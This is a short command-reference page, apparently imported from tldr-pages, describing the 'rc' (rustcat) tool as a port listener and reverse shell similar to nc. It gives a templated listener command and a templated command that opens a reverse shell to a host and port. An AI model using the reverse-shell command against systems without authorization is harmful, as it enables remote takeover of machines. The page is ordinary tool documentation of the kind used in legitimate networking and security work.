HiveBrain v1.2.0
Get Started
← Back to all entries
snippetbashTip

rc — A modern simplistic port listener & reverse shell. Similar to `nc`. More information: <https://githu

Submitted by: @import:tldr-pages··
0
Viewed 0 times
portlistenercommandrcmodernclireversesimplistic

Problem

How to use the rc command: A modern simplistic port listener & reverse shell. Similar to nc. More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.

Solution

rc — A modern simplistic port listener & reverse shell. Similar to nc. More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.

Start listening on a specific port:
rc -lp {{port}}


Start a reverse shell:
rc {{host}} {{port}} -r {{shell}}

Code Snippets

Start listening on a specific port

rc -lp {{port}}

Start a reverse shell

rc {{host}} {{port}} -r {{shell}}

Context

tldr-pages: common/rc

Revisions (0)

No revisions yet.